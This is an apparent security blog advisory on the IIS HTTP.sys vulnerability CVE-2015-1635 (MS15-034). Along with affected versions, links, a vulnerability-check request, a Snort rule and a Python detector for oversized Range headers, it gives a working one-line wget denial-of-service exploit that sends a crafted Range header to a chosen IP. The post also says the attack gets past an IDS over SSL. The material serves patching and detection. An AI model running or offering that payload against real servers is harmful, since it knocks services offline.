The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system.
Denial of Service (DoS) exploits are widely available for CVE-2015-1635, a vulnerability in HTTP.sys affecting Internet Information Server (IIS). The patch was released on Tuesday (April 14th) as part of Microsoft’s Patch Tuesday.
CVE
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635
KB Number 3042553
https://support.microsoft.com/en-us/kb/3042553
Summary
The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. The security update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Attack Vectors
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system.
Affected software
Windows 7, Windows 8, Windows 8.1, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2
Also note that this exploit works over SSL, meaning it can be used to bypass your IDS or other network protections.
DOS Exploit
Add the IP you desire to exploit where I have 127.0.0.1. Note that the requested resource has to be a static file.
wget --header="Range: bytes=18-18446744073709551615" http://127.0.0.1/welcome.png
The result is that the server is now unavailable.
Python Script to Test
Just change the IP inside the file and run within Python.
Results of the test.
Link to the file Link
Request Check
Send the following request to your IIS server:
GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615
If the server responds with “Requested Header Range Not Satisfiable”, then you may be vulnerable. Results may be inconclusive as Erratasec has stated.
Snort Rule
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"MS15-034 Range Header HTTP.sys Exploit"; content:"|0d 0a|Range: bytes="; nocase; content:"-"; within:20; byte_test:10,>,1000000000,0,relative,string,dec; sid:1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger than 1000000000)
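The same check without the 10-byte limit, as an added example that is not part of the original post: a Python function that parses a raw HTTP request and flags any Range offset too large to be a real file position. The 2**63 threshold, the function names and the sample requests are assumptions constructed for this example.

```python
# Added example: flag HTTP requests whose Range header carries a byte offset
# too large to be a real file position (the pattern in the requests above).

# Assumption: offsets at or above 2**63 are never legitimate.
SUSPICIOUS_OFFSET = 2**63


def _offset(token: bytes):
    """Parse one decimal offset; None if empty or non-numeric."""
    token = token.strip()
    if not token.isdigit():
        return None
    token = token.lstrip(b"0") or b"0"
    # More than 20 digits cannot fit in 64 bits; clamp rather than parse
    # untrusted input of unbounded length.
    return int(token) if len(token) <= 20 else 2**64


def suspicious_ranges(raw_request: bytes) -> list:
    """Return (start, end) pairs from Range headers with an oversized offset."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    hits = []
    for line in head.splitlines()[1:]:  # skip the request line
        name, colon, value = line.partition(b":")
        if not colon or name.strip().lower() != b"range":
            continue
        unit, eq, specs = value.partition(b"=")
        if not eq or unit.strip().lower() != b"bytes":
            continue
        for spec in specs.split(b","):
            first, dash, last = spec.partition(b"-")
            if not dash:
                continue
            start, end = _offset(first), _offset(last)
            if any(v is not None and v >= SUSPICIOUS_OFFSET for v in (start, end)):
                hits.append((start, end))
    return hits


# Constructed sample requests (the two large Range values are the ones on this page).
SAMPLES = {
    "request_check": b"GET / HTTP/1.1\r\nHost: MS15034\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "wget_style": b"GET /welcome.png HTTP/1.1\r\nHost: 127.0.0.1\r\nRange: bytes=18-18446744073709551615\r\n\r\n",
    "benign": b"GET /welcome.png HTTP/1.1\r\nHost: 127.0.0.1\r\nRange: bytes=0-1023, -500\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, suspicious_ranges(request))
```

Because the request also works over SSL, a check like this only sees the header where traffic is already decrypted, for example on a TLS-terminating proxy or in web server logs that record the Range header.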